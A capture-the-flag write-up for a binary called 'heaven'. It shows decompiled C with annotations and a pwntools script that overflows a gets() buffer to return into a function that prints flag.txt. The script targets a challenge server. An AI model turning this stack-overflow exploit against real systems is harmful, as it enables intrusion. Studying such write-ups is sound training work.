Rating:

We were given a binary.

// Dumps flag.txt to stdout one byte at a time. Not reached from the main() shown below.
int heavens_secret()
{
  char v1; // [rsp+7h] [rbp-9h]  -- holds the fgetc() result, truncated from int to char
  FILE *stream; // [rsp+8h] [rbp-8h]

  stream = fopen("flag.txt", "r"); // no NULL check: if the file is missing, fgetc() below dereferences NULL
  do
  {
    v1 = fgetc(stream); // fgetc() returns int; storing it in a char makes a 0xFF data byte look like EOF
    putchar(v1); // runs before the EOF test, so the EOF value itself is written once as 0xFF
  }
  while ( v1 != -1 ); // terminates only because char is signed on x86-64; on an unsigned-char ABI this never holds
  return fclose(stream);
}

// Entry point: prints a menu, reads one line with gets(), and dispatches on the first byte only.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char nptr[524]; // [rsp+0h] [rbp-210h] BYREF  -- 524 bytes of nptr plus v5 fill the 0x210 bytes below the saved rbp
  int v5; // [rsp+20Ch] [rbp-4h]

  setvbuf(stdout, 0LL, 2, 0LL); // 2 == _IONBF: unbuffered, so prompts are flushed before the read
  setvbuf(stderr, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 2, 0LL);
  puts("Welcome to heaven!");
  puts("what would you like to do here:");
  printf(" 1. rest\n 2. have fun\n 3. relive a memory\n 4. get the flag\n>>");
  gets(nptr); // no length bound: input longer than the frame overwrites the saved rbp and the return address. Mitigation: fgets(nptr, sizeof nptr, stdin)
  v5 = atoi(nptr); // dead store: v5 is never read; the menu is dispatched on the raw first byte below
  if ( nptr[0] == 52 ) // '4': the "get the flag" option does not call heavens_secret()
    return puts("what is this option?");
  if ( nptr[0] <= 52 )
  {
    if ( nptr[0] == 51 ) // '3'
      return puts("wether it's a good one or a hurtful one we all want to relive a memory, so here you go.");
    if ( nptr[0] <= 51 )
    {
      if ( nptr[0] == 49 ) // '1'
        return puts("you chose wisely, after all you have been through u deserve to rest");
      if ( nptr[0] == 50 ) // '2'
        return puts("nice choice!!!. who doesnt want to have fun in their life ;)");
    }
  }
  return puts("dude how did you even get here!?"); // any other first byte (including empty input) lands here
}

The program asks the user for input using the gets() function, which performs no bounds check, so it introduces a buffer-overflow vulnerability. Since there is a function that reads and prints the contents of the flag file (heavens_secret), we can perform a ROP-style ret2win (return to the heavens_secret function).

Solver:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
from os import path
import sys

# ==========================[ Information
# Paths are resolved relative to this file so the script works from any cwd.
DIR = path.dirname(path.abspath(__file__))  # directory containing this script
EXECUTABLE = "/heaven"  # binary name; the leading slash is what joins it to DIR below
TARGET = f"{DIR}{EXECUTABLE}"  # absolute path of the challenge binary
HOST = "52.59.124.14"  # remote challenge endpoint
PORT = 10050
REMOTE = False  # mode flags; one of them is set to True in __main__ once the target is chosen
LOCAL = False

# ==========================[ Tools
elf = ELF(TARGET)  # parsed challenge binary; exploit() reads elf.symbols["heavens_secret"] from it
elfROP = ROP(elf)  # gadget finder; constructed but not referenced anywhere else in this script

# ==========================[ Configuration
# Target is x86-64 Linux, little-endian; only warnings are logged; a debugger opens in a tmux split.
context.update(
    arch="amd64",
    endian="little",
    os="linux",
    log_level="warn",
    terminal=["tmux", "split-window", "-h"],
)

# ==========================[ Exploit

def exploit(io, libc=null) -> None:
    """Send the ret2win payload over *io* and hand the tube to the user.

    Args:
        io: pwntools tube to the target (``process`` or ``remote``), created in ``__main__``.
        libc: not used in this function; kept for the template's signature.
            NOTE(review): ``null`` is not a Python name -- presumably ``None`` was intended;
            unless the wildcard import supplies ``null``, evaluating this ``def`` raises NameError.
    """
    if LOCAL==True:  # module-level flag set in __main__; ``if LOCAL:`` is the idiomatic form
        #raw_input("Fire GDB!")
        if len(sys.argv) > 1 and sys.argv[1] == "d":  # a first CLI argument of "d" attaches a debugger
            choosen_gdb = [
                "source /home/mydata/tools/gdb/gdb-pwndbg/gdbinit.py",     # 0 - pwndbg
                "source /home/mydata/tools/gdb/gdb-peda/peda.py",          # 1 - peda
                "source /home/mydata/tools/gdb/gdb-gef/.gdbinit-gef.py"    # 2 - gef
                ][0]
            cmd = choosen_gdb + """
            
            """
            gdb.attach(io, gdbscript=cmd)
    
    # Layout mirrors the decompiled frame: nptr sits at rbp-0x210, so 0x210 bytes of
    # padding reach the saved rbp, followed by the return-address slot.
    p = b""
    p += b"A"*(0x210) # sub rbp, 0x210
    p += p64(0xdeadbeef) # rbp -- overwrites the saved rbp slot
    p += p64(elf.symbols["heavens_secret"]) # rip -- raw symbol address; presumably the binary is non-PIE, verify with checksec

    io.sendline(p)
    io.interactive()

if __name__ == "__main__":
    # Target selection: ``REMOTE`` on the command line (pwntools ``args``) connects to HOST:PORT,
    # otherwise the local binary at TARGET is spawned.
    io, libc = null, null  # NOTE(review): ``null`` is not a Python builtin; ``None`` is the usual sentinel

    if args.REMOTE:
        REMOTE = True  # this block runs at module scope, so the global is assigned directly
        io = remote(HOST, PORT)
        # libc = ELF("___")
        
    else:
        LOCAL = True
        io = process(
            [TARGET, ],
            env={
            #     "LD_PRELOAD":DIR+"/___",
            #     "LD_LIBRARY_PATH":DIR+"/___",
            },  # NOTE(review): an empty dict is passed, not None -- confirm whether this pwntools version then inherits os.environ or starts the child with an empty environment
        )
        # libc = ELF("___")
    exploit(io, libc)
    ```